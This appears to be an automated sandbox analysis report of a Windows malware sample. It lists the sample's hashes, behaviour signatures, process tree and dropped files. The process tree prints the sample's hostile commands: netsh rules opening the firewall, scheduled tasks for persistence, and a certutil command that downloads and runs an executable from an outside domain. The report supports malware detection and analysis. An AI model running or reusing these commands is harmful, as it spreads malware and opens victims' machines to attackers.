Analysis
-
max time kernel
23s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
24-05-2022 03:13
Static task
static1
Behavioral task
behavioral1
Sample
57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe
Resource
win10v2004-20220414-en
General
-
Target
57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe
-
Size
3.8MB
-
MD5
384c8fe4b39ea4b83c8eec594d1851f1
-
SHA1
6d41e9496c2dc79c5b46fe33133b764aaa8a6e64
-
SHA256
57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04
-
SHA512
ddd9b07cbbfeee5c6044093b293bb4b176497f9a0ed8850f55729f65771387a7571c373d614491b8c17d2ce589e4d13aacf4b78e754da9aa6424556713b1cfd4
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 2964 created 740 2964 svchost.exe 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 2320 bcdedit.exe -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 4636 740 WerFault.exe 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe 868 2260 WerFault.exe 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exepid process 740 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe 740 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe 2260 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe 2260 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exesvchost.exedescription pid process Token: SeDebugPrivilege 740 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe Token: SeImpersonatePrivilege 740 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe Token: SeTcbPrivilege 2964 svchost.exe Token: SeTcbPrivilege 2964 svchost.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
svchost.exe57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.execmd.exedescription pid process target process PID 2964 wrote to memory of 2260 2964 svchost.exe 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe PID 2964 wrote to memory of 2260 2964 svchost.exe 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe PID 2964 wrote to memory of 2260 2964 svchost.exe 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe PID 2260 wrote to memory of 1732 2260 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe cmd.exe PID 2260 wrote to memory of 1732 2260 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe cmd.exe PID 1732 wrote to memory of 1816 1732 cmd.exe netsh.exe PID 1732 wrote to memory of 1816 1732 cmd.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe"C:\Users\Admin\AppData\Local\Temp\57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe"C:\Users\Admin\AppData\Local\Temp\57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes4⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 7403⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 740 -s 6162⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 740 -ip 7401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2260 -ip 22601⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
C:\Windows\rss\csrss.exeFilesize
1.8MB
MD5f6ef2297c55136864abd8e029b895b33
SHA1569a4d79fa6cf994b54cd9a2d17663fab3fe66b6
SHA2564df9cb6a10836c093dbd48c4be8bb1555bed88946e46d7758bfe35a4205a82c9
SHA51259ae7cee1d6f2ebd5a038a2b30c9268afce25392286694d2a880e06f5de47d365c88c8f3db67e401ae155551a1115e9590d13ba15b44d004797ba928cb237dc5
-
C:\Windows\rss\csrss.exeFilesize
1.8MB
MD5f2e1db6684475c51a24261ecaed827a5
SHA10b7051dae61ccfd30ae55a381da6f4963bebfa21
SHA25650af99d65f5c8391e7f8d31f5c2f9344dae2c7364424d111e78a8e7856a697e6
SHA5127cedaeffdb508e6d7c8a5cc6681131e73a4f518927cf01dffa75495a8e9f48d84a272343ed433c791567ba8654781d487d5241b1cce149a3d9b1c02988e4bd50
-
memory/116-145-0x0000000000000000-mapping.dmp
-
memory/740-131-0x0000000003010000-0x0000000003705000-memory.dmpFilesize
7.0MB
-
memory/740-132-0x0000000000400000-0x0000000000BDA000-memory.dmpFilesize
7.9MB
-
memory/740-130-0x0000000002C64000-0x000000000300A000-memory.dmpFilesize
3.6MB
-
memory/1732-136-0x0000000000000000-mapping.dmp
-
memory/1816-137-0x0000000000000000-mapping.dmp
-
memory/1980-139-0x0000000000000000-mapping.dmp
-
memory/2260-135-0x0000000000400000-0x0000000000BDA000-memory.dmpFilesize
7.9MB
-
memory/2260-134-0x0000000002938000-0x0000000002CDE000-memory.dmpFilesize
3.6MB
-
memory/2260-133-0x0000000000000000-mapping.dmp
-
memory/2320-150-0x0000000000000000-mapping.dmp
-
memory/3756-146-0x0000000000000000-mapping.dmp
-
memory/3836-148-0x0000000000000000-mapping.dmp
-
memory/4484-138-0x0000000000000000-mapping.dmp
-
memory/5076-140-0x0000000000000000-mapping.dmp
-
memory/5076-144-0x0000000003100000-0x00000000037F5000-memory.dmpFilesize
7.0MB
-
memory/5076-143-0x0000000002D00000-0x00000000030A6000-memory.dmpFilesize
3.6MB
-
memory/5076-147-0x0000000000400000-0x0000000000BDA000-memory.dmpFilesize
7.9MB